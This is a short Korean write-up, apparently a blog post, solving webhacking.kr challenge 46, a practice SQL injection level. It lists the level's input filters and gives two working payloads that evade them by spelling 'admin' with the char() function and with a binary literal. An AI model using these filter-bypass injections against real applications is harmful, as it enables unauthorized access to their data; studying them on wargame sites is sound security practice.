webhacking.kr 46 SQL 인젝션 우회

Sirius·2023년 3월 31일

1. addslashes

" , ' 를 차단한다.

2. replace

  1. 공백
  2. "/"
  3. "*"
  4. "%"

3. pregmatch

  1. select
  2. 0x
  3. limit
  4. cash

공격

1. char함수

char함수필터링은 존재하지 않는다.

0||id=char(97,100,109,105,110)

2. 이진수

0x는 필터링하지만 이진수는 필터링 하지 않는다.

0||id=0b0110000101100100011011010110100101101110

0개의 댓글